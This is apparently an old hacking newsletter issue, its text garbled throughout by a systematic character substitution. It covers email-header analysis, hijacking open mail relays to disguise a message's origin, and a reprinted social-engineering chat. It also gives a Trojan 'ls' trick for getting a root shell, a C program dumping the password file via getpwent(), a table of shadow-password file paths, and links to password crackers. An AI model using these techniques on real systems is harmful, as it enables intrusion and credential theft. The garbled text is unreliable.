make sure( we try the command `telnet Hubarino&com -5&a #his gi<es us the answer: --M Hubarino&com 3S6#+ Sendmail D&D&%ID&E&9 ready at 6on( -D *.r ,99K M9:55:5D G6# So from this we know Hubarino&com is running the Sendmail .rogram& )))))))))))))))))))))))))))))))))))))))))))))))))) 3<il genius ti.: Sendmail is notorious for flaws that you can use to gain root access to a com.uter& So e<en though Hubarino&com is using a <ersion of sendmail that has been fi'ed from its most recently .ublici>ed security holes( if you are .atient a new e'.loit will almost certainly come out within the ne't few months& #he cure for this .roblem may .ossibly be to run @mail( which so far hasnbt had embarrassing .roblems& )))))))))))))))))))))))))))))))))))))))))))))))))) 48( now letbs look at the ne't `recei<eda line in that header: 5ecei<ed: from /1S+++ ? ,99&'''&,9%&,KE by csi&com with 6icrosoft S6#+SC/A Sun( -K *.r ,99K --:5%:%E ?MGMM /1S+++ stands for /om.user<e 1nformation Ser<ices .oint to .oint .rotocol !+++$ connection& #his means that the mail was sent from a +++ connection 1 set u. through /om.user<e& We also see that /om.user<e uses the 6icrosoft S6#+SC/ mail .rogram& Howe<er( we see from the rest of the header that the sender !me$ didnbt use the standard /om.user<e mail interface: 6essage?1d: ^-&-&,E&,99KMG-DMD-,%-&-cdf5GGeJfubaretta&comV #he number -&-&,E& was inserted by 3udora( and means 1 am using 3udora +ro -&-( ,E?bit <ersion& #he ,99KMG-DMD-,%- means the time 1 sent the email( in order of year !,99K$( month !MG$( day !-D$ and time !MD:%,:%-$& #he .ortion of the message 12 `-cdf5GGeJfubaretta&coma is the most im.ortant .art& #hat is .ro<ided by the 1nternet host where a record of my use of fubarettabs mail ser<er has been stored&

2id you notice this message 12 was not stored with /om.user<e( but rather with fubaretta&com? #his is( first of all( because the message 12 is created with the +4+ ser<er that 1 s.ecified with 3udora& Since /om.user<e does not yet offer +4+ ser<ers( 1 can only use 3udora to send email o<er a /om.user<e connection but not to recei<e /om.user<e email& So( heck( 1 can s.ecify an arbitrary +4+ ser<er when 1 send email o<er /om.user<e from 3udora& 1 .icked the Hubaretta 1S+& So there 1f 1 were to ha<e done something bad news with that email such as s.amming( e'tortion or email bombing( the sysadmin at fubaretta&com would look u. that message 12 and find information tying that email to my /om.user<e account& #hat assumes( of course( that fubaretta&com is archi<ing message 12s& So when you read this .art of the header you might think that the com.uter where 1 .ick u. my email is with the Hubaretta&com 1S+& But all this really means is that 1 s.ecified to 3udora that 1 was using a mail account at Hubar& But if 1 had .ut a different account name there( then 1 would ha<e generated a different message 12& 2id 1 need to ha<e an account at Hubaretta? "o& #he mail ser<er did not ask for a .assword& 1n fact( 1 donbt ha<e an account at Hubaretta& #he rest of the header is information .ro<ided by 3udora: U?Sender: cmeinelJfubar&com U?6ailer: Windows 3udora +ro Cersion -&- !,E$ 6ime?Cersion: ,&M /ontent?#y.e: te'tI.lainA charsetW:us?ascii: #he `U?6ailera information tells you 1 was using the ,E bit <ersion of Windows 3udora +ro Cersion -&-& Some .eo.le ha<e asked me why 1 donbt use the %- bit <ersion !which runs on Win 95$ instead of the ,E bit <ersion& *nswer: better error handling #hatbs the same reason 1 donbt normally use +egasus& *lso( 3udora lets me get away with stu.h:$ 6ime !6ulti.ur.ose 1nternet 6ail 3'tensions$is a .rotocol to <iew email& #hose of you who got lots of garbage when 1 sent out G#6HH and 2igest can blame it on 6ime& 1f your email .rogram doesnbt use 6ime( you get lots of stuff like `W9-a instead of what 1 tried to send& But this time 1 turned off the `.rinted @uotablea feature in 3udora& So this time 1 ho.e 1 sent all you

guys .lain( friendly *S/11& +lease email me if what you got was still messed u.( 48? #he character set `us?asciia tells us what character set this email will use& Some email uses 1S4 ascii instead( generally if it originates outside the 0S& "ow letbs look at a slightly more e'citing header& 1n fact( this is a genuine muhahaha header& 5emember that war 1 declared on Web sites that .ro<ide downloads of email bombing .rograms? ;ou know( those Windows 95 for lusers .rograms that run from a few mouse clicks? Herebs a header that re<eals my tiny contribution toward making life un.leasant for the 1S+s that distribute these .rograms& 1tbs from the Ha..y Hacker 2igest( *.ril ,-( ,99K( from a co.y that reached a test email address 1 had on the list: 5ecei<ed: by o-MM&fooway&net !95MG,%&SG1&D&E&,-I95,-,,&SG1$for techbrJfooway&net id 6**MKM59A 6on( ,G *.r ,99K ,-:M5:-5 ?MGMM 2ate: 6on( ,G *.r ,99K ,-:M5:-- ?MGMM 5ecei<ed: from mocha&icefubarnet&com by o-MM&fooway&net <ia 3S6#+ !95MG,%&SG1&D&E&,-I95,-,,&SG1$ for ^.ettitJtechbroker&comV id 6**ME%DMA 6on( ,G *.r ,99K ,-:M5:-M ?MGMM 5ecei<ed: from cmeinel !hd,G?-,,&foo&com.user<e&com Y-ME&'''&-M5&-,,Z$ by mocha&icefubarnet&com !"etsca.e 6ail Ser<er <-&M,$ with S6#+ id **+%G-DA 6on( ,G *.r ,99K MD:5,:M- ?MKMM 6essage?1d: ^-&-&,E&,99KMG,G,MM,--&G%DKd-MaJmail&fooway&netV U?Sender: techbrJmail&fooway&net !0n<erified$ U?6ailer: Windows 3udora +ro Cersion -&- !,E$ 6ime?Cersion: ,&M /ontent?#y.e: te'tI.lainA charsetW:iso?DD59?,: #o: !5eci.ient list su..ressed$ Hrom: :/arolyn +& 6einel: ^cmeinelJtechbroker&comV Sub=ect: Ha..y Hacker 2igest *.ril ,-( ,99K "ow letbs e'amine the first field: 5ecei<ed: by o-MM&fooway&net !95MG,%&SG1&D&E&,-I95,-,,&SG1$for techbrJfooway&net id 6**MKM59A 6on( ,G *.r ,99K ,-:M5:-5 ?MGMM 2ate: 6on( ,G *.r ,99K ,-:M5:-- ?MGMM We already looked at this com.uter o-MM&fooway&net abo<e& But( heck( letbs .robe a little more dee.ly& Since 1 sus.ect this is a +4+ ser<er( 1bm going to telnet to .ort ,,M( which is normally the +4+ ser<er .ort&

V telnet o-MM&fooway&net ,,M #rying -MK&'''&,9-&5K&&& /onnected to o-MM&fooway&net& 3sca.e character is 'BZ'& X48 S0*7/466 +o. ser<er deri<ed from 0/B !<ersion -&,&G?5%$ at mail starting& "ow we know more about Hooway #echnologybs +4+ ser<er& 1f you ha<e e<er run one of those hacker `strobea ty.e .rograms that tell you what .rograms are running on each .ort of a com.uter( there is really no big deal to it& #hey =ust automate the .rocess that we are doing here by hand& But in my humble o.inion you will learn much more by strobing .orts by hand the same way 1 am doing here& "ow we could do lots more strobing( but 1bm getting bored& So we check out the second field in this header: 2ate: 6on( ,G *.r ,99K ,-:M5:-- ?MGMM #hat ?MGMM is a time correction& But to what is it correcting? 7etbs see the ne't field in the header: 5ecei<ed: from mocha&icefubarnet&com by o-MM&fooway&net <ia 3S6#+ !95MG,%&SG1&D&E&,-I95,-,,&SG1$ for ^hackerJtechbroker&comV id 6**ME%DMA 6on( ,G *.r ,99K ,-:M5:-M ?MGMM Hmmm( why is mocha&icefubarnet&com in the header? 1f this header isnbt forged( it means this mail ser<er was handling the Ha..y Hacker 2igest mailing& So where is mocha&icefubarnet&com located? * @uick use of the whois command tells us: V whois icefubarnet&com 1/3H0B*5"3# 1"#35"3#( 1"/ !1/3H0B*5"3#?246$ -,KD Hooway "orth Bar( 4regon 9K''' 0S* "ow this is located four time >ones earlier than the com.uter o-MM&fooway&net& So this e'.lains the time correction notation of ?MGMM&

"e't field on the header tells us: 5ecei<ed: from cmeinel !hd,G?-,,&foo&com.user<e&com Y-ME&'''&-M5&-,,Z$ by mocha&icefubarnet&com !"etsca.e 6ail Ser<er <-&M,$ with S6#+ id **+%G-DA 6on( ,G *.r ,99K MD:5,:M- ?MKMM #his tells us that the Ha..y Hacker 2igest was deli<ered to the mail ser<er !S6#+ stands for sim.le mail trans.ort .rotocol$ at mocha&icefubarnet&com by /om.user<e& But( and this is <ery im.ortant to obser<e( once again 1 did not use the /om.user<e mail system& #his merely re.resents a +++ session 1 set u. with /om.user<e& How can you tell? +laying with nslooku. shows that the numerical re.resentation of my /om.user<e connection isnbt an 1nternet host& But you canbt learn much more easily because /om.user<e has great security ?? one reason 1 use it& But take my word for it( this is another way to see a /om.user<e +++ session in a header& "ow we get to the biggie( the message 12: 6essage?1d: ^-&-&,E&,99KMG,G,MM,--&G%DKd-MaJmail&fooway&netV Whoa( how come that 12 is at the com.uter mail&fooway&net? 1tbs .retty sim.le& 1n 3udora 1 s.ecified my +4+ ser<er as mail&fooway&net& But if you were to do a little stobing( you would disco<er that while fooway&net has a +4+ ser<er( it doesnbt ha<e an S6#+ or 3S6#+ ser<er& ;ou can get mail from Hooway( but you canbt mail stuff out from Hooway& But the mar<elous workings of the 1nternet combined with the nai<ete of the 3udora +ro -&.rogram sent my message 12 off to mail&fooway&net anyhow& 4n the message 12( the `-&-&,Ea was inserted by 3udora& #hat signifies it is the -&- <ersion for a ,E bit o.erating system& #he remaining fields of the header were all inserted by 3udora: U?Sender: techbrJmail&fooway&net !0n<erified$ U?6ailer: Windows 3udora +ro Cersion -&- !,E$ 6ime?Cersion: ,&M /ontent?#y.e: te'tI.lainA charsetW:iso?DD59?,: #o: !5eci.ient list su..ressed$ Hrom: :/arolyn +& 6einel: ^cmeinelJtechbroker&comV Sub=ect: Ha..y Hacker 2igest *.ril ,-( ,99K

"otice 3udora does let us know that techbrJmail&fooway&net is un<erified as sender& *nd in fact( it definitely is not the sender& #his is a <ery im.ortant fact& #he message 12 of an email is not necessarily stored with the com.uter that sent it out& So how was 1 able to use 1cefubarnet 1nternetbs mail ser<er to send out the Ha..y Hacker 2igest? Hortunately 3udorabs nai<ete makes it easy for me to use any mail ser<er that has an o.en S6#+ or 3S6#+ .ort& ;ou may be sur.rised to disco<er that there are uncountable 1nternet mail ser<ers that you may easily commandeer to send out your email ?? if you ha<e the right .rogram ?? or if you know how to telnet to .ort -5 !which runs using the S6#+ or 3S6#+ .rotocols$ and gi<e the commands to send email yourself& Why did 1 use 1cefubarnet? Because at the time it was hosting an ft. site that was being used to download email bomber .rograms !htt.:IIwww&icefubarnet&comI]astormIuyGbeta,&>i.$& 7ast time 1 checked the owner of the account from which he was offering this ugly stuff was unha..y because 1cefubarnet 1nternet had made him take it down& But ?? back to how to commandeer mail ser<ers while sending your message 1ds elsewhere& 1n 3udora( =ust s.ecify your <ictim mail ser<er under the hosts section of the o.tions menu !under tools$& #hen s.ecify the com.uter to which you want to send your message 12 under `+4+ Ser<er&a But if you try any of this monkey business with +egasus( it gi<es a nasty error message accusing you of trying to forge email& 4f course you can always commandeer mail ser<ers by writing your own .rogram to commander mail ser<ers& But that will be co<ered in the u.coming G#6HH on shell .rogramming& ))))))))))))))))))))))))))))))))))))))))))))) "ewbie note: Shell .rogramming? What the heck i>>at? 1t means writing a .rogram that uses a se@uence of commands a<ailable to you in your 0ni' shell& 1f you want to be a real hacker( you )must) learn 0ni' 1f you are serious about continuing to study these G#6HHs( you )must) either get a shell account or install some form of 0ni' on your home com.uter& ;ou may find .laces where you can sign u. for shell accounts through htt.:IIwww&celestin&comI.ociaI& 4r email ha'orshellJtechbroker&com for information on how to sign u. with a shell account that is friendly to hackers and that you may securely telnet into from your local 1S+ +++ dialu.&

))))))))))))))))))))))))))))))))))))))))))))) Hang( on( Col& % "umber 5 will get into the really hairy stuff: how to do ad<anced deci.hering of forged headers& ;es( how to catch that %,,%K dMMd who emailbombed you or s.ammed you Ha..y Hacking( and be good FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF G0123 #4 !mostly$ H*5673SS H*/81"G Col& % "o& 5 #he 2read G#6HH on /racking FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF "owadays if you ask =ust about anyone what a hacker is( he or she will tell you `a .erson who breaks into com.uters&a #hat is .artly on account of news stories which make it seem like the only thing a hacker does is commit com.uter crime& But there also is some truth to the .ublic <iew& *n obsession with breaking into com.uters has swe.t the hacker world& 1n fact( lots of hackers make fun of the kinds of stuff 1 think is fun: forging email and 0senet .osts and .rogramming 3aster eggs into commercial software and creating Win 95 bootu. screens that say `Bill Gatesb mother wears army boots&a But since e<eryone and his brother has been emailing me .leading for instructions on how to break into com.uters( here it is& #he dread G#6HH on /racking& ;es( you( too( can become a genuine com.uter cracker and make e<eryone @uake in his or her boots or sli..ers or whate<er footgear they are wearing lately& `But( but(a you say& `#his list is for )legal) hacking& Se> right here in the welcome message you sent me when 1 signed u.&a Welcome to reality( Bub& Hackers fib sometimes& ))))))))))))))))))))))))))))))))))))))))))))))))

;ou can go to =ail warning: *lmost e<erywhere on the .lanet( breaking into a com.uter is illegal& #he only e'ce.tions are breaking into your own com.uter( or breaking into a com.uter whose owner has gi<en you .ermission to try to break in& 1t doesnbt matter if you are =ust @uietly sneaking around doing no harm& 1t doesnbt matter if you make some strangerbs com.uter better& ;oubre still in trouble if you break in without .ermission& )))))))))))))))))))))))))))))))))))))))))))))))) Honestly( this Guide really )is) about harmless hacking& ;ou donbt ha<e to commit a crime to crack into a com.uter& Hrom time to time hardy souls offer u. their com.uters for their friends( or sometimes e<en the entire world( as targets for cracking& 1f you ha<e .ermission from the owner of a com.uter( it is most definitely legal to break into it& 1n fact( herebs a really fun com.uter that you ha<e .ermission to break into& 2amien Sorder in<ites you to break into his 1nternet host com.uter obscure&sekurity&org& But how do you know whether this or any other announcement of a cracker welcome mat is legitimate? How do you know 1bm not =ust .laying a mean old trick on 2amien by sending out an in<itation to break into his bo' to the 5(MMM cra>ed readers of the Ha..y Hacker list? Herebs a good way to check the <alidity of offers to let anyone try to break into a com.uter& Get the domain name of the target com.uter( in this case obscure&sekurity&org& #hen add `rootJa to the domain name( for e'am.le rootJobscure&sekurity&org& 3mail the owner of that com.uter& *sk him if 1 was fibbing about his offer& 1f he says 1 made it u.( tell him hebs =ust chicken( that if he was a real hacker hebd be ha..y to ha<e thousands of clueless newbies running Satan against his bo'& Rust kidding:$ *ctually( in this case you may email infoJsekurity&org for more details on 2amienbs offer to let one and all try to crack his bo'& *lso( .lease be good guys and attack off hours !6ountain 2aylight Sa<ings #ime( 0S$ so he can use obscure&sekurity&org for other stuff during the day& *lso( 2amien re@uests `1f you !or anyone$ want to try to hack obscure( .lease mail rootJsekurity&org and mention that you are doing it( and what domain you are coming from& #hat way 1 can distinguish between legit and real attacks&a

We all owe you thanks( 2amien( for .ro<iding a legal target for the readers of this G#6HH to test their cracking skills& So letbs assume that you ha<e chosen a legitimate target com.uter to try to break into& What? Some guys say itbs too hard to break into a fortified bo' like obscure&sekurity&org? #hey say itbs more fun to break into a com.uter when theybre breaking the law? #hey say to be a 5eal Hacker you must run around trashing the bo'es of the cringing masses of 1nternet hosts? Haw( haw( sendmail G&M What lusers( they say& #hey sure taught those sendmail G&M dudes a lesson( right? 1 say that those crackers who go searching for <ulnerable com.uters and breaking into them are like 7ounge 7i>ard 7arry going into a bar and .icking u. the drunkest( ugliest gal !or guy$ in the .lace& ;eah( we all are sure im.ressed& 1f you want to be a truly elite cracker( howe<er( you will limit your forays to com.uters whose owners consent to your e'.lorations& #his can ?? should ?? include your own com.uter& So with this in mind ?? that you want more from life than to be the 7ounge 7i>ard 7arry of the hacker world ?? here are some basics of breaking into com.uters& #here are an ama>ing number of ways to break into com.uters& #he sim.lest is to social engineer your way in& #his generally in<ol<es lying& Herebs an e'am.le& ))))))))))))))))))))))))))))))))))))))))))))) Hrom: 4racle Ser<ice Humour 7ist ^oracle?list?return?Jsyna.se&netV Sub=ect: H06: *47 Hacker #urnaround !)))$ 5ead "ewf.yr's masterful turning of the tables on a hacker&&& /ertainly one of the best *bsurd 16s we'<e 3C35 recei<ed "ewf.yr's comments are in brackets throughout& QabuG5,: Hello from *merica 4nline 1'm sorry to inform you that there has been an error in the 1I4 section of your account database( and this ser<er's .assword information has been tem.orarily destroyed& We need you( the *47 user( to hit re.ly and ty.e in your .assword& #hank you for your

hel.& "ewf.yr: Hello #his is Ser<er 6anager 95E%& 1'm sorry to hear that your ser<er has lost the .assword info& 1 mean( this has been ha..ening too much lately& We ha<e de<elo.ed some solutions to this .roblem& Ha<e you got the mail sent out to all ser<er managers? QabuG5,: no "ewf+yr: 5eally? 4uch& #here's been some .roblems with the ser<er mailer lately& 4h( well& Here's a solution to this .roblem: try connecting your backu. database to your main 1I4 .ort( then accessing the system restart& QabuG5,: no i still need .asswords "ewf+yr: 1 see& 2o you want me to send you the list of all the .asswords of all the screen names of your ser<er? QabuG5,: ya i want that "ewf+yr: 7et me get the ser<er manager to send it&&& "ewf+yr: He says 1 need your ser<er manager .assword& /ould you .lease ty.e it in? QabuG5,: i dont ha<e one "ewf+yr: What do you mean? #hat's the first thing e<ery manager gets QabuG5,: it got deleted "ewf+yr: Wow ;ou must be ha<ing a lot of trouble& 7et me find out what ser<er you're using&&& Y"ote: 1 checked his .rofile& 1t said he was from S.ringfield( 6ass&Z "ewf+yr: 4kay( your number has been tracked to an area in S.ringfield( 6ass& QabuG5,: how did u know? ? ? ? ? ? ? ??

"ewf+yr: 1 used Ser<er #racker 5&M & 2on't you ha<e it? QabuG5,: do you know my address ? ? ? ? ? "ewf+yr: 4f course not& QabuG5,: good "ewf+yr: 1 only know the number you're calling *47 from( which is from your ser<er( right? QabuG5,: yes "ewf+yr: Good& 4kay( now that we ha<e your number( we ha<e your address( and we are sending a re.air team o<er there& QabuG5,: nonononono dont sto. them now "ewf+yr: Why? 1sn't your ser<er down? QabuG5,: nonono its working now "ewf+yr: #heybre still coming( =ust in case& QabuG5,: S#4+ #H36 "4W "ewf+yr: 1 can't break *47 +olicy& QabuG5,: +43+73 *53 /461"G #4 6; H40S3? ? ? ? ?? "ewf+yr: "o #o your ser<er& ;ou know( where you're calling *47 from& QabuG5,: im calling from my house "ewf+yr: But you said you where calling from the ser<er QabuG5,: i lied im not reely a ser<er guy "ewf+yr: But you said you were QabuG5,: i lied i trying to get .asswords .lease make them sto.

"ewf+yr: 4kay& #he re.air team isn't coming anymore& QabuG5,: good "ewf+yr: But a team of HB1 agents is& QabuG5,: "4"4"4"4 QabuG5,: im sorry QabuG5,: ill ne<er do it again .lease make them not come QabuG5,: +73*S3 17 S#4+ *S81"G H45 +*SSW452S H453C35 +73*S3 6*83 #H36 S#4+ "ewf+yr: 1bm sorry( 1 can't do that& #hey should be at your house in 5 minutes& QabuG5,: 16 S455; 17 24 *";#H1"G +73*S3 1 24"# W*"# #H36 #4 H05# 63 QabuG5,: +73*S3 QabuG5,: +733333333333333*********SSSSSSSS3 "ewf+yr: #hey won't hurt you ;ou'll .robably only s.end a year of .rison& QabuG5,: no 16 4"7; * 812 "ewf+yr: ;ou are? #hat makes it different& ;ou wonbt go to .rison for a year& QabuG5,: i thout so "ewf+yr: ;oubll go for two years& QabuG5,: "o 16 S455; QabuG5,: +73*S3 6*83 #H36 S#4+ QabuG5,: +73*S3 Y1 thought this was enough& He was .robably wetting his .ants&Z "ewf+yr: Since this was a first time offense( 1 think 1 can dro. charges& QabuG5,: yea QabuG5,: thankyouthankyouthankyou

"ewf+yr: #he HB1 agents ha<e been withdrawn& 1f you e<er do it again( we'll bum. you off& QabuG5,: i wont im sorry goodbye YHe .rom.tly signed off&Z 4ne of the 5*53 5*53 occasions that we'<e actually felt sorry for the hacker& S3C3"#; H1C3 #483"S to you( "ewf+yr We're S#177 laughing ? thanks a lot Submitted by: Hran /& 6& #& J aol&com !Want more of this humor in a =ugular <ein? /heck out htt.:IIwww&netforward&comI.obo'esI?ablang$ ))))))))))))))))))))))))))))))))))))))))) 6aybe you are too embarrassed to act like a ty.ical *47 social engineering hacker& 48( then maybe you are ready to try the #ro=an Horse& #his is a ty.e of attack wherein a .rogram that a..ears to do something legitimate has been altered to attack a com.uter& Hor e'am.le( on a 0ni' shell account you might .ut a #ro=an in your home directory named `ls&a #hen you tell tech su..ort that there is something funny going on in your home directory& 1f the tech su..ort guy is sufficiently clueless( he may go into you account while he has root .ermission& He then gi<es the command `lsa to see whatbs there& *ccording to 2amien Sorder( `#his will only work de.ending on his '+*#H' statement for his shell& 1f he searches '&' before 'Ibin'( then it will work& 3lse( it won't&a +resuming the sysadmin has been this careless( and if your #ro=an is well written( it will call the real ls .rogram to dis.lay your file info ?? while also s.awning a root shell for your <ery own use ))))))))))))))))))))))))))))))))))))))))))))))))))) "ewbie note: if you can get into a root shell you can do anything ?? *";#H1"G ?? to your <ictim com.uter& *las( this means it is sur.risingly easy to screw u. a 0ni' system while o.erating as root& * good systems administrator will gi<e him or herself root .ri<ileges only when absolutely necessary to .erform a task& #ro=ans are only one of the many reasons for this

caution& Before you in<ite your friends to hack your bo'( be .re.ared for anything( and 1 mean *";#H1"G( to get messed u. e<en by the most well? meaning of friends& ))))))))))))))))))))))))))))))))))))))))))))))))))) *nother attack is to install a sniffer .rogram on an 1nternet host and grab .asswords& What this means is any time you want to log into a com.uter from another com.uter by using telnet( your .assword is at the mercy of any sniffer .rogram that may be installed on any com.uter through which your .assword tra<els& Howe<er( to set u. a sniffer you must be root on the 0ni' bo' on which it is installed& So this attack is clearly not for the beginner& #o get an idea of how many com.uters `seea your .assword when you telnet into your remote account( gi<e the command !on a 0ni' system$ of `traceroute my&com.utera !itbs `tracerta in Windows 95$ where you substitute the name of the com.uter you were .lanning to log in on for the `my&com.uter&a Sometimes you may disco<er that when you telnet from one com.uter to another e<en within the city you li<e in( you may go through a do>en or more com.uters Hor e'am.le( when 1 trace a route from an *lbu@uer@ue *47 session to my fa<orite 7inu' bo' in *lbu@uer@ue( 1 get: /:TW1"24WSVtracert fubar&com #racing route to fubar&com Y-MD&,-D&''&E,Z o<er a ma'imum of %M ho.s: , %-- ms %-D ms - GEK ms %-9 ms % GEK ms %-% ms G GEK ms %-9 ms Y,GM&--%&5K &-5Z 5 GE9 ms %D- ms E G-E ms 5GD ms K %99 ms GGD ms D GMM ms GEE ms Y-MG&KM&,9,&5,Z %-9 ms %-9 ms %-D ms G9% ms %-9 ms G%K ms GE, ms 5,- ms i.t?@,&.ro'y&aol&com Y,5-&,E%&-M5&95Z tot?ta?r5&.ro'y&aol&com Y,5-&,E%&-M5&,-EZ fG?,&tEM?G&5eston&t%&ans&net Y-MK&-5&,%G&E9Z h,M?,&t5E?,&Washington?2/&t%&ans&net ,GM&---&5E&KM core%&6em.his&mci&net Y-MG&KM&,-5&,Z core-?hssi?-&Houston&mci&net Y-MG&KM&,&,E9Z borderK?fddi?M&Houston&mci&net

9 G95 ms G9% ms Y-MG&KM&,9G&DE Z ,M 5-- ms 9D9 ms ,, GED ms G9% ms ,- 55, ms G9, ms

G9- ms american?comm?s<c&Houston&mci&net G9M ms webdownlink&foobar&net Y-MD&,-D&%K&9DZ G9, ms -MD&,-D&''&%% G9- ms fubar&com Y-MD&,-D&''&E,Z

1f someone were to .ut a sniffer on any com.uter on that route( they could get my .assword "ow do you want to go telneting around from one of your accounts to another? * solution to this .roblem is to use Secure Shell& #his is a .rogram you can download for free from htt.:IIescert&u.c&esIothersIsshI& *ccording to the .romotional literature( `Ssh !Secure Shell$ is a .rogram to log into another com.uter o<er a network( to e'ecute commands in a remote machine( and to mo<e files from one machine to another& 1t .ro<ides strong authentication and secure communications o<er insecure channels&a 1f you want to get a .assword on a com.uter that you know is being accessed remotely by .eo.le using Windows %&U( and if it is using #rum.et Winsock( and if you can get .hysical access to that Windows bo'( there is a su.er easy way to unco<er the .assword& ;ou can find the details( which are so easy they will blow your socks off( in the Bugtra@ archi<es& 7ook for an entry titled `+assword .roblem in #rum.et Winsock&a #hese archi<es are at htt.:IIwww&nets.ace&orgIls<?archi<eIbugtra@&html *nother way to break into a com.uter is to get the entire .assword file& 4f course the .assword file will be encry.ted& But if your target com.uter doesnbt run a .rogram to .re<ent .eo.le from .icking easy .asswords( it is easy to decry.t many .asswords& But how do you get .assword files? * good systems administrator will hide them well so e<en users on the machine that holds them canbt easily obtain the file& #he sim.lest way to get a .assword file is to steal a backu. ta.e from your <ictim& #his is one reason that most com.uter breakins are committed by insiders&

But often it is easy to get the entire .assword file of a 7*" remotely from across the 1nternet& Why should this be so? #hink about what ha..ens when you log in& 3<en before the com.uter knows who you are( you must be able to command it to com.are your user name and .assword with its .assword file& What the com.uter does is .erform its encry.tion o.eration on the .assword you enter and then com.are it with the encry.ted entries in the .assword file& So the entire world must ha<e access somehow to this encry.ted .assword file& ;ou =ob as the would?be cracker is to figure out the name of this file and then get your target com.uter to deli<er this file to you& * tutorial on how to do this( which was .ublished in the e>ine 8&5&*&/&8 !.roduced by odB.heak ^butlerJtir&comV$( follows& /omments in brackets ha<e been added to the 8&5&*&/&8& te't& ))))))))))))))))))))))))))))))))))))))))))))) Strategy Hor Getting 5oot With a shadowed +asswd ste.9, anonymous ft. into the ser<er get .asswd Y#his ste. will almost ne<er work( but e<en the sim.lest attack may be worth a try&Z ste. 9#o defeat .assword shadowing on many !but not all$ systems( write a .rogram that uses successi<e calls to get.went!$ to obtain the .assword file& 3'am.le: 9include ^.wd&hV main!$ [ struct .asswd ).A while!.W%2get.went!$$ .rintf!:Ps:Ps:Pd:Pd:Ps:Ps:PsTn:( .?V.wFname( .?V.wF.asswd(

.?V.wFuid( .?V.wFgid( .?V.wFgecos( .?V.wFdir( .?V.wFshell$A \ 4r u can 7ook for the 0nshadowed Backu.&&&&& Y#he following list of likely .laces to find the unshadowed backu. is a<ailable from the `Hack H*Sa written by Coyager& 1t may be obtained from htt.:II www?.ersonal&engin&umich&eduI]=gottsIhack?fa@Z 0ni' +ath needed #oken ?????????????????????????????????????????????????????????????????????? *1U % IetcIsecurityI.asswd or ItcbIauthIfilesI^first letter 9 of usernameVI^usernameV *I0U %&Ms ItcbIfilesIauthI?I ) BS2G&%?5eno IetcImaster&.asswd ) /on<e'4S ,M IetcIshad.w ) /on<e'4S ,, IetcIshadow ) 2GI0U IetcItcbIaaIuserI ) 3+I1U IetcIshadow ' H+?0U I&secureIetcI.asswd ) 151U 5 IetcIshadow ' 7inu' ,&, IetcIshadow ) 4SHI, IetcI.asswdY&dir_&.agZ ) S/4 0ni' 9&-&' ItcbIauthIfilesI^first letter ) of usernameVI^usernameV Sun4SG&,XcIetcIsecurityI.asswd&ad=unct W 99username Sun4S 5&M IetcIshadow ^o.tional "1SX .ri<ate secure ma.sItablesIwhate<erV System C 5elease G&M IetcIshadow ' System C 5elease G&IetcIsecurityI) database 0ltri' G IetcIauthY&dir_&.agZ ) 0"1/4S IetcIudb W-M

Ste. 9%

crack it YSee below for instructions on how to crack a .assword file&Z )))))))))))))))))))))))))))))))))))))))))))))))))) So letbs say you ha<e managed to get an encry.ted .assword file& How do you e'tract the .asswords? *n e'am.le of one of the many .rograms that can crack .oorly chosen .asswords is 0ni' +assword /racker by Scooter /or.& 1t is a<ailable at ft.:IIft.&info&bishkek&suI0"1UIcrack?-aIcrack?-a&tg> or htt.:IIiukr&bishkek&suIcrackIinde'&html * good tutorial on some of the issues of cracking Windows "# .asswords may be found at htt.:IIntbugtra@&rc&on&caIsamfa@&htm 4ne .assword cracker for Windows "# is 7M.htcrack <,&5& 1t is a<ailable for H533 from htt.:IIwww&7M.ht&com !that's a Q354 after the '7'( not an 'o'$& 1t comes with source so you can build it on =ust about any .latform& *uthors are mudgeJlM.ht&com and weldJlM.ht&com& *nother Windows "# .assword cracker is *lec 6uffett's /rack 5&M at htt.:IIwww&sun&rhbnc&ac&ukI].hac,MKIc5Ma?nt?M&,M&tg> 3<en if you crack some .asswords( you will still need to correlate .asswords with user names& 4ne way to do this is to get a list of users by fingering your target com.uter& See the G#6HH Col&, "o&, for some ways to finger as many users as .ossible on a system& #he <erify command in sendmail is another way to get user names& * good systems administrator will turn off both the finger daemon and the sendmail <erify command to make it harder for outsiders to break into their com.uters& 1f finger and the <erify commands are disabled( there is yet another way to get user names& 4ftentimes the .art of a .ersonbs email that comes before the `Ja will also be a user name&

1f .assword cracking doesnbt work( there are many ?? way too many ?? other ways to break into a com.uter& Hollowing are some suggestions on how to learn these techni@ues& ,& 7earn as much as you can about the com.uter you ha<e targeted& Hind out what o.erating system it runsA whether it is on a local area networkA and what .rograms it is running& 4f s.ecial im.ortance are the .orts that are o.en and the daemons running on them& Hor e'am.le( if you can get .hysical access to the com.uter( you can always get control of it one way or another& See the G#6HHs on Windows for many e'am.les& What this means( of course( is that if you ha<e something on your com.uter you absolutely( .ositi<ely donbt want anyone to read( you had better encry.t it with 5S*& "ot +G+( 5S*& #hen you should ho.e no one disco<ers a fast way to factor numbers !the mathematical *chilles Heel of 5S* and +G+$& 1f you canbt get .hysical access( your ne't best bet is if you are on the same 7*"& 1n fact( the <ast ma=ority of com.uter breakins are done by .eo.le who are em.loyees of the com.any that is running that 7*" on which the <ictim com.uter is attached& #he most common mistake of com.uter security .rofessionals is to set u. a firewall against the outside world while lea<ing their 7*" wide o.en to insider attack& 1m.ortant note: if you ha<e e<en one Windows 95 bo' on your 7*"( you canbt e<en begin to .retend you ha<e a secure network& #hat is in large .art because it will run in 24S mode( which allows any user to read( write and delete files& 1f the com.uter you ha<e targeted is on the 1nternet( your ne't ste. would be to determine how it is connected to the 1nternet& #he most im.ortant issue here is what #/+I1+ .orts are o.en and what daemons run on these .orts& ))))))))))))))))))))))))))))))))))))))))))))))))))) "ewbie note: #/+I1+ .orts are actually .rotocols used to direct data into .rograms called `daemonsa that run all the time an 1nternet host com.uter is turned on and connected to the "et( waiting for incoming or outgoing data to s.ur it into action& *n e'am.le of a #/+I1+ .ort is number -5( called S6#+ !sim.le mail trans.ort .rotocol$& *n e'am.le of a daemon that can do interesting things

